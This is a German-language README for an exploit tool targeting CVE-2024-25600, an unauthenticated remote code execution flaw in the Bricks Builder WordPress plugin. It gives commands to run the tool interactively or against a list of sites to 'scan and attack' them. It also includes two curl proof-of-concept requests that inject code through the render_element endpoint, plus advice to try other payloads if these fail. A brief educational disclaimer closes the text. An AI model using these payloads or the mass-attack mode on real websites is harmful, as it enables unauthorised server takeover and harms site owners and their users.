
Dieses Tool wurde entwickelt, um die Schwachstelle CVE-2024-25600 auszunutzen, die im Bricks Builder Plugin für WordPress gefunden wurde. Die Schwachstelle ermöglicht eine nicht authentifizierte Remote-Codeausführung auf betroffenen Websites. Das Tool automatisiert den Exploit-Prozess, indem es Nonces abruft und speziell gestaltete Anfragen sendet, um beliebige Befehle auszuführen.
Dieses Tool 🛠️ wurde entwickelt, um die Sicherheitslücke CVE-2024-25600 🕳️ auszunutzen, die im Bricks Builder Plugin für WordPress gefunden wurde. Die Schwachstelle ermöglicht eine nicht authentifizierte Remote-Code-Ausführung auf betroffenen Websites 💻. Das Tool automatisiert den Ausnutzungsprozess, indem es Nonces abruft und speziell gestaltete Anfragen sendet, um beliebige Befehle auszuführen.
git clone.pip install -r requirements.txt.python exploit.py -u <URL>, um den interaktiven Modus zu öffnen.python exploit.py -l <file_path> aus, um die aufgeführten Websites zu scannen und anzugreifen.Der grundlegende PoC aus der Offenlegung lautet wie folgt:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Aktualisierung: Zweiter PoC (zuverlässiger)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Es ist möglich, dass zusätzliche Payloads bessere Ergebnisse liefern. Sollte mein Exploit oder Proof of Concept bei Ihnen nicht funktionieren, empfehle ich Ihnen, mit alternativen Payloads zu experimentieren, um eine effektivere Lösung zu finden.
Ersetzen Sie [HOST] durch die Zielwebsite und [NONCE] durch den von der Website abgerufenen Nonce-Wert.
Weitere Informationen zur Sicherheitslücke CVE-2024-25600 finden Sie in der ausführlichen Offenlegung unter Snicco.io.
Die in dieser README bereitgestellten Informationen dienen ausschließlich zu Bildungszwecken. Unbefugtes Hacken von Websites oder Netzwerken ist illegal und unethisch. 🚫
Dank an die Sicherheitsforscher, die diese Schwachstelle entdeckt und gemeldet haben und der Community Informationen und Tools zur Verfügung stellen, um ihre Webanwendungen zu schützen.